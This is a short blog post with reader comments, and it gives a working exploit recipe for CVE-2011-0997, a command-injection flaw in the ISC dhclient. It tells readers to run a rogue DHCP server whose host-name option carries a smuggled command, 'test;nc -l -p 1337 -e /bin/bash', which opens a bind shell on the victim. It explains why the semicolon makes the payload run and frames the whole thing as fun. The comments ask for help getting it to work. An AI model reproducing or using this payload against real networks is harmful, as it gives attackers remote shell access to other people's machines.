Fun with CVE-2011-0997

Saw a killer dhcp client bug come across the wire the other day and thought it would be fun to play around with. Heres some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.

This is super easy to exploit, all you need to do is set up a DHCP server and edit the clients hostname to include our payload! Once you get dhcp up and running edit your /etc/dchp3/dhcpd.conf and locate the line that loks something like this:
subnet netmask {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now using the above payload when someone requests an IP from you and its accepted a shell will open on port 1337 on their machine 😀

What happens is the victims computer gets the hostname value from DHCP, then just runs it against the shell. Now because we added a shell metacharacter “;” we are telling the shell that it has multipliable commands to execute which in the above case its the commands to change the hostname to test and “nc -l -p 1337 -e /bin/bash”. Fun right? Ok thats it, peace.

9 thoughts on “Fun with CVE-2011-0997

    • Oh crap, good catch on that. Thank you. Yes the victim hes to be setup to get its hostname from DHCP and i tested it on Ubuntu.

  1. In what version of ubuntu you tried it?

    I’m working on a 10.10 non patched but the trick it’s not working, can you give me more informations?

    Best regards,


  2. Bit late, I know, but would this trick be able to force open a port for SSH on the time capsule itself? That would be cool, if there was a way.

Leave a Reply

Your email address will not be published. Required fields are marked *